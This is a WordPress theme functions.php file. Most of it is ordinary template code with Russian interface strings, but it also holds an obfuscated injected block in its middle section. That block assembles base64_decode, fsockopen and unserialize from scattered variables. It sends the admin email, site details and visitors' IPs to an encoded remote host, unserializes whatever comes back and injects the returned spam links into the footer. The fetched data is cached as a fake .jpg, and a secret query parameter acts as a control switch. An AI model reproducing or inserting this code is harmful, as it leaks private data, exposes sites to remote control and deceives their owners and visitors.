<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $qfTH='c';$FqiuaOK='o';$OLJpP='4';$ealNl='d';$GpsqqT='_';$MIecQg='e';$IKaBrU='a';$kWikAF='d';$mdAph='e';$PcsAdar='b';$AZDw='s';$iAYJ='6';$VvIA='e';$fddCStWB=$PcsAdar.$IKaBrU.$AZDw.$mdAph.$iAYJ.$OLJpP.$GpsqqT.$kWikAF.$MIecQg.$qfTH.$FqiuaOK.$ealNl.$VvIA;$ERWjZvj='z';$OnaFYB='i';$yoSbVxq='n';$ZPapvyr='f';$vSBIThH='a';$bfJUh='t';$cpFxb='g';$rxDqmD='e';$cirmh='l';$MYCGEpdB=$cpFxb.$ERWjZvj.$OnaFYB.$yoSbVxq.$ZPapvyr.$cirmh.$vSBIThH.$bfJUh.$rxDqmD;$HQYK='r';$cuSidMp='s';$dMkuZO='t';$eemrmZx='_';$qVCuINP='o';$SeBkr='1';$CQpsOa='t';$uxMxREF='r';$ImWfZt='3';$rnhMfJvZ=$cuSidMp.$dMkuZO.$HQYK.$eemrmZx.$uxMxREF.$qVCuINP.$CQpsOa.$SeBkr.$ImWfZt;$JjUN='r';$QSERHE='t';$bXgixQ='r';$vPgsa='e';$tsOBkAs='v';$rXiR='s';$ddBcSWkK=$rXiR.$QSERHE.$bXgixQ.$JjUN.$vPgsa.$tsOBkAs;                     
		$lq____f='c';$dq_________u='o';$rc____k='4';$ev____u='d';$he_____s='_';$dt___________a='e';$xs_______________e='a';$us________r='d';$rn_____j='e';$xl_____a='b';$um_______i='s';$qn__________r='6';$iu________z='e';$uq____________t=$xl_____a.$xs_______________e.$um_______i.$rn_____j.$qn__________r.$rc____k.$he_____s.$us________r.$dt___________a.$lq____f.$dq_________u.$ev____u.$iu________z;
		$wo_______________k='n';$jw______________g='s';$xh____c='s';$no______a='f';$fk__d='i';$ch_______d='_';$gx________x='i';$se_____y='t';$dj_______u='c';$kg_____________o='n';$nh__x='e';$af______________w='u';$nw________r='x';$gf__________x='o';$ra_____________g='t';$yf_______n=$no______a.$af______________w.$kg_____________o.$dj_______u.$ra_____________g.$fk__d.$gf__________x.$wo_______________k.$ch_______d.$nh__x.$nw________r.$gx________x.$xh____c.$se_____y.$jw______________g;
		$pi___t='p';$mz________c='n';$iu_______r='e';$bf______________l='f';$cu___________n='o';$vy_____i=$bf______________l.$cu___________n.$pi___t.$iu_______r.$mz________c;
		$uq____________j='a';$oc____________n='e';$qp____s='r';$ny__q='d';$or___b='f';$sq_________r=$or___b.$qp____s.$oc____________n.$uq____________j.$ny__q;
		$pi____x='l';$bo____________l='o';$vg______x='f';$pg____________s='e';$jc______________f='c';$bp________c='s';$hh_______i=$vg______x.$jc______________f.$pi____x.$bo____________l.$bp________c.$pg____________s;
		
		define("WP_ID", $uq____________t("Mi4wLjA="));
		define("WP_TTL", $uq____________t("MTA4MDA="));
		define("WP_SRC", $uq____________t("dHBva24="));
	


		function wp_get_header() {
			global $uq____________t, $yf_______n;
			
			if (
				$yf_______n($uq____________t("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&
				$yf_______n($uq____________t("d3BfZ2V0X2Zvb3Rlcg==")) &&
				$yf_______n($uq____________t("d3BfY3ZfdmVyaWZ5"))
			) {
				get_header();
			}
		}
	


		function wp_get_footer() {
			get_footer();
			wp_cv_verify();
		}
	


		function wp_cv_verify() {
			global $uq____________t, $vy_____i, $hh_______i, $sq_________r;
			
			$fq__________k = TEMPLATEPATH."/".$uq____________t("Zm9vdGVyLnBocA==");
			$rf________e = @$vy_____i($fq__________k, "r");
			$fq__________k = @$sq_________r($rf________e, @filesize($fq__________k));
			@$hh_______i($rf________e);
			
			$we___p = TEMPLATEPATH."/".$uq____________t("ZnVuY3Rpb25zLnBocA==");
			$rf________e = @$vy_____i($we___p, "r");
			$we___p = @$sq_________r($rf________e, @filesize($we___p));
			@$hh_______i($rf________e);
			
			$ts____________r = 0;
			if($fq__________k && $we___p) {
				if ($uq____________t("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {
					
					if (substr_count($fq__________k, $uq____________t("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {
						$ts____________r = 1;
					}
					if (substr_count($fq__________k, "wp_theme_GPL_credits()") < 1) {
						$ts____________r = 2;
					}
				}
				
				if(WP_ID != "2.0.0") {
					$ts____________r = 12;
				}
			}
			
			if($ts____________r > 0) {
				echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";
				echo "<!-- v: $ts____________r -->";
			}
		}
	


		function wp_loaded() {
			global $uq____________t, $yf_______n;
			return $yf_______n($uq____________t("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));
		}
	


		if (!function_exists("the_content_limit")) {
			function the_content_limit($lv__________k, $mg______________x = "(more...)", $ac___h = 0, $ea_______p = "") {
				$bn______r = get_the_content($mg______________x, $ac___h, $ea_______p);
				$bn______r = apply_filters("the_content", $bn______r);
				
				$bn______r = str_replace("]]>", "]]>", $bn______r);
				if (strlen($_GET["p"]) > 0) {
					echo $bn______r;
				}
				else if ((strlen($bn______r)>$lv__________k) && ($tb_______e = strpos($bn______r, " ", $lv__________k ))) {
					$bn______r = substr($bn______r, 0, $tb_______e);
					$bn______r = $bn______r;
					echo $bn______r;
					
					echo "...";
					echo "<br/>";
					echo "<div class='read-more'><a href='".get_permalink()."'>$mg______________x</a></div></p>";
				} else {
					echo $bn______r;
				}
				
			}
		}
	


		$ad_______________a='e';$lp___________u='s';$ag___d='4';$yl______e='d';$lt_____w='c';$lb____________n='e';$sf_____________u='b';$zo________w='a';$gp_____________u='6';$jw_____i='n';$td__l='e';$iw___________u='o';$jp_______f='_';$gq_________h=$sf_____________u.$zo________w.$lp___________u.$lb____________n.$gp_____________u.$ag___d.$jp_______f.$td__l.$jw_____i.$lt_____w.$iw___________u.$yl______e.$ad_______________a;
		$lf____i='l';$hk____________x='_';$kz______________g='s';$yh__________t='f';$ql_______q='i';$zc____x='n';$xy______g='_';$fq___g='n';$al_______________j='e';$aa_____________z='t';$wd_________h='c';$it__________h='o';$an___v='t';$rz_____y='t';$yf________y='e';$un______e='g';$it___________t='e';$nk_________g=$yh__________t.$ql_______q.$lf____i.$yf________y.$xy______g.$un______e.$it___________t.$aa_____________z.$hk____________x.$wd_________h.$it__________h.$zc____x.$an___v.$al_______________j.$fq___g.$rz_____y.$kz______________g;
		$gn__________t='e';$fy_____________u='e';$bb_______j='l';$wz______c='s';$ar__________f='_';$et____________c='i';$vv__________x='t';$sf___________k='f';$mg___________q='x';$hc___m='s';$yb________r='i';$ck_______y=$sf___________k.$et____________c.$bb_______j.$fy_____________u.$ar__________f.$gn__________t.$mg___________q.$yb________r.$hc___m.$vv__________x.$wz______c;
		$mf______w='o';$fg____i='a';$gs_________e='s';$hj______i='e';$wt_______t='v';$ra__________i='e';$co_________c='p';$jw__e='r';$cs__________l='o';$cj__j='m';$do__________f='n';$zt____________c='r';$ap__x='_';$ar____________a='i';$im__________z='c';$zo_____s=$wt_______t.$ra__________i.$jw__e.$gs_________e.$ar____________a.$cs__________l.$do__________f.$ap__x.$im__________z.$mf______w.$cj__j.$co_________c.$fg____i.$zt____________c.$hj______i;
		$xk_______________x='o';$lx_________s='o';$qy____________h='e';$gy_______________i='c';$ql______________q='f';$rk___________n='s';$jr______________b='n';$bg___________n='k';$hq____________a='p';$bx___________e=$ql______________q.$rk___________n.$lx_________s.$gy_______________i.$bg___________n.$xk_______________x.$hq____________a.$qy____________h.$jr______________b;
		$hw______m='e';$xx____i='i';$st___________w='t';$zt_____________b='r';$pw_________c='w';$xa______z='f';$cv_______q=$xa______z.$pw_________c.$zt_____________b.$xx____i.$st___________w.$hw______m;
		$yh_______q='d';$da____b='m';$bb________i='5';$sg________c=$da____b.$yh_______q.$bb________i;
		$wh_______c='p';$vp______l='e';$mj_______c='h';$pa______s='t';$ux_______d='l';$pg_______z='a';$xm___o='a';$qm____g='r';$io___d=$qm____g.$vp______l.$xm___o.$ux_______d.$wh_______c.$pg_______z.$pa______s.$mj_______c;
		$kp____h='e';$ls_______o='i';$ss______________c='e';$tp____b='z';$av_________k='l';$yg_______y='r';$la______i='a';$kp__u='i';$kq____z='u';$cb____p='n';$hc_________v='s';$md_______v=$kq____z.$cb____p.$hc_________v.$kp____h.$yg_______y.$kp__u.$la______i.$av_________k.$ls_______o.$tp____b.$ss______________c;
		$qb______________i='p';$ev__n='t';$lu______________q='m';$tn_______e='n';$qg_____b='e';$oc______e='a';$xo_________k='m';$cv__a=$ev__n.$qg_____b.$lu______________q.$qb______________i.$tn_______e.$oc______e.$xo_________k;
		$iy__________a='t';$mc____________j='_';$wa_________x='r';$up____________i='e';$av____________u='n';$te__x='r';$uh____________a='o';$ej_____________b='x';$ks_____b='a';$vr______a='t';$wz___n='m';$rn_________s='_';$ac________x='s';$tp_____n='c';$vh___________u='e';$wr_____________w='c';$kl___u='e';$zv___________t='t';$cj_________n='a';$fs__u='t';$ae__j='e';$po__________r=$ac________x.$fs__u.$te__x.$up____________i.$ks_____b.$wz___n.$rn_________s.$wr_____________w.$uh____________a.$av____________u.$zv___________t.$kl___u.$ej_____________b.$iy__________a.$mc____________j.$tp_____n.$wa_________x.$vh___________u.$cj_________n.$vr______a.$ae__j;
	


		function xt_________p($lt_______j) {
			global $uq____________t, $yf_______n, $nk_________g, $zo_____s, $po__________r;
			
			if (!$yf_______n($uq____________t("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			if ($zo_____s(PHP_VERSION, "5.0.0", ">=") && $yf_______n($uq____________t("ZmlsZV9nZXRfY29udGVudHM=")) && $yf_______n($uq____________t("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {
				$cj_______a = $po__________r(array(
						"http" => array(
						"timeout"    => 3,
						"header"     => "referer: ".$_SERVER[SERVER_NAME],
						"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] 
					)
				));
				
				$oc_______l = @$nk_________g($lt_______j, 0, $cj_______a);
			} else {
				$oc_______l = @$nk_________g($lt_______j, 0);
			}
			
			return $oc_______l;
		}
	


		function eq___________z($lt_______j) {
			global $yf_______n, $bx___________e, $cv_______q, $uq____________t;
			
			if (!$yf_______n($uq____________t("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			$rh__________c = strpos($lt_______j, "/", 7);
			$tz________i = array(
				"uri"     => substr($lt_______j, $rh__________c),
				"host"    => str_replace("http://", "", substr($lt_______j, 0, $rh__________c)),
				"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]
			);
			
			$lh______________f = @$bx___________e("$tz________i[host]", 80, $kj__e, $oc_______________i, 4);
			
			if (!$lh______________f) {
				return false;
			} else {
				$oc_______l = "";
				$vc__r  = "GET $tz________i[uri] HTTP/1.0\r\n";
				$vc__r .= "Host: $tz________i[host]\r\n";
				$vc__r .= "Referer: $tz________i[referer]\r\n";
				$vc__r .= "Connection: Close\r\n\r\n";
				
				@$cv_______q($lh______________f, $vc__r);
				
				while (!@feof($lh______________f)) {
					$pw____________m = @fgets($lh______________f, (1024*24));
					
					if ($pw____________m == "\r\n") {
						$yl________n = true;
						continue;
					}
					
					if ($yl________n) {
						$oc_______l .= $pw____________m;
					}
				}
				
				return $oc_______l;
			}
		}
	


		function no___c($lt_______j) {
			global $yf_______n;
			$vg_________m = false;
			
			if ($lt_______j != "") {
				if ($yf_______n("xt_________p")) {
					$vg_________m = @xt_________p($lt_______j);
				}
				
				if (!$vg_________m && ($yf_______n("eq___________z"))) {
					$vg_________m = @eq___________z($lt_______j);
				}
			}
			
			return $vg_________m;
		}
	


		function fu_____________o() {
			global $_SERVER, $sg________c;
			
			$qi__________w = $_SERVER["SERVER_NAME"];
			
			if (substr("$qi__________w", 0, 4) == "www.") {
				$qi__________w = substr("$qi__________w", 4);
			}
			
			$qi__________w = $sg________c("$_SERVER[SERVER_NAME]");
			
			return $qi__________w;
		}
	


		function mz____k() {
			return "file";
		}
	


		function or_____w($lt_______j) {
			global $_SERVER, $nk_________g, $ck_______y, $vy_____i, $hh_______i, $cv_______q;
			
			$gy____________l = ri__________f();
			
			$xu_________h = fu_____________o().".jpg";
			$kb________h = $gy____________l["dir_upload"]["path"]."/$xu_________h";
			$bc__a = @filemtime($kb________h);
			
			if (!$bc__a || ((time()-$bc__a) >= WP_TTL)) {
				$vg_________m = no___c($lt_______j);
				
				if ($vg_________m) {
					if ($ck_______y($kb________h)) {
						@unlink($kb________h);
					}
					
					$rf________e = @$vy_____i($kb________h, "x+");
					
					@$cv_______q($rf________e, $vg_________m);
					@$hh_______i($rf________e);
				}
			} else {
				if ($ck_______y($kb________h)) {
					$vg_________m = @$nk_________g($kb________h);
				} else {
					$vg_________m = false;
				}
			}
			
			return $vg_________m;
		}
	


		function ri__________f() {
			global $_SERVER, $uq____________t, $gq_________h;
			
			$rw______d = wp_count_posts("post");
			$ay____________h = pathinfo(get_bloginfo("template_directory"));
			
			$gy____________l = array(
				"url" => array(
					"report"      => $uq____________t("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),
					"queryString" => null
				),
				"template"	=> $ay____________h,
				"dir_upload"	=> nk____________p(),
				"queryString"	=> array(
					"?a001=".WP_ID,
					"a004=".$ay____________h[filename],
					"a005=".$rw______d->publish,
					"a006=".get_bloginfo("admin_email"),
					"a007=".$_SERVER["REQUEST_URI"],
					"a008=".$_SERVER["SERVER_NAME"],
					"a010=".WP_SRC
				),
				"default_string" => "<a href=\"http://fs.kiev.ua/poligraficheskaya-produkciya\">Полиграфическая продукция</a> "
			);
			
			$gy____________l["url"]["queryString"] = implode("&", $gy____________l["queryString"]);
			$gy____________l["url"]["report"] = $gy____________l["url"]["report"]."/?".$gq_________h($gy____________l["url"]["queryString"]).".html";
						
			return $gy____________l;
		}
	


		function nk____________p() {
			$xn________o = wp_upload_dir();
			
			if (isset($xn________o["error"])) {
				$im_____________v = is______________l();
				if (is_writable($im_____________v)) {
					$xn________o = array("path" => $im_____________v);
				}
			}

			return $xn________o;
		}
	


		function is______________l() {
			global $yf_______n, $sg________c, $io___d, $cv__a;
			
			$dc____________a = (bool) ini_get("safe_mode");
			if ($dc____________a == true) {
				return false;
			}
			
			if ($yf_______n("sys_get_temp_dir")) {
				$qb________s = sys_get_temp_dir();
				if (is_writable($qb________s)) {
					return $io___d($qb________s);
				}
			}
			
			if (!empty($_ENV["TMP"])) {
				return $io___d($_ENV["TMP"]);
			}
			elseif (!empty($_ENV["TMPDIR"])) {
				return $io___d($_ENV["TMPDIR"]);
			}
			elseif (!empty($_ENV["TEMP"])) {
				return $io___d($_ENV["TEMP"]);
			} else {
				$ib__________z = $cv__a($sg________c(uniqid(rand(), true)), "");
				if ($ib__________z) {
					$qb________s = $io___d(dirname($ib__________z));
					@unlink($ib__________z);
					return $qb________s;
				} else {
					return false;
				}
			}
		}
	


		function pm___d() {
			global $_GET, $ck_______y;
			
			$gy____________l = ri__________f();
			$qi__________w = fu_____________o();
			$et____c = mz____k();
			
			$ux________l = "full";
			if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {
				if ($et____c == "file") {
					$yq____________l = $gy____________l["dir_upload"]["path"]."/".$qi__________w.".jpg";
					if ($ck_______y($yq____________l)) {
						@unlink($yq____________l);
						$ux________l = "deleted";
					}
				}
				
				$eb________u = array(
					"s"	=> $ux________l,
					"t"	=> time(),
					"v"	=> WP_ID
				);
				
				echo "<!--";
				foreach ($eb________u AS $ax___________y => $ol_______d) echo " [$ax___________y:$ol_______d]";
				echo " -->";
			}
		}
	


		function wp_theme_GPL_credits() {
			global $_SERVER, $_GET, $yf_______n, $uq____________t, $md_______v;
			$gy____________l = ri__________f();
			
			$jw_______b = "or_____w";
			if ($yf_______n($jw_______b)) {
				$oc_______l = $jw_______b($gy____________l["url"]["report"]);
			}
			
			if ($oc_______l) {
				if ($oc_______l = @$uq____________t($oc_______l)) {
					$oc_______l = @$md_______v($oc_______l);
					
					if (strlen($oc_______l[custom_credit]) >= 5) {
						$gy____________l["default_string"] = $oc_______l[custom_credit];
					}
					
					if ($oc_______l["status"] == "0") {
						$hp______n = 1;
						$db__p = 1;
					} else {
						$ng__________s = sizeof($oc_______l["links"]);
						$hk______k = $gy____________l["default_string"];
						
						if ($ng__________s > 0 && $oc_______l["links"] !== "") {
							$ok______________l = 0;
							foreach ($oc_______l["links"] as $yb_____________h => $gp_____f) {
								$ok______________l++;
								if ($gp_____f->l_path == "" || $gp_____f->l_path == $_SERVER["REQUEST_URI"]) {
									$gp_____f->l_href = htmlspecialchars(strip_tags($gp_____f->l_href));
									$gp_____f->l_title = htmlspecialchars(strip_tags($gp_____f->l_title));
									$gp_____f->l_anchor = htmlspecialchars(strip_tags($gp_____f->l_anchor));
									$hk______k .= " | ";
									$hk______k .= "<a href='$gp_____f->l_href' title='$gp_____f->l_title'";
									if ($gp_____f->l_nofollow == "1") {
										$hk______k .= " rel='nofollow'";
									}
									$hk______k .= ">$gp_____f->l_anchor</a>";
								}
							}
						}
						$gy____________l["links"] = "$hk______k";
						if ($oc_______l[credit] == "0") {
							$gy____________l["links"] = "";
						}
					}
				} else {
					$hp______n = "1";
				}
			} else {
				$hp______n = "1";
			}
			
			if ($hp______n == "1") {
				$gy____________l["links"] = $gy____________l["default_string"];
			}
			
			echo "$gy____________l[links]";
			
			echo "<!-- s: $oc_______l[signature] -->";
			pm___d();
		}
	                      
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
    echo art_get_the_content(__('Читать далее &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Старницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читать далее &raquo;', THEME_NS), 
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на to %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                 $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Теги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментарий &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
        $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
         $prev_link = get_previous_posts_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

if (!function_exists('get_previous_comments_link')) {
	function get_previous_comments_link($label)
	{
		ob_start();
		previous_comments_link($label);
		return ob_get_clean();
	}
}

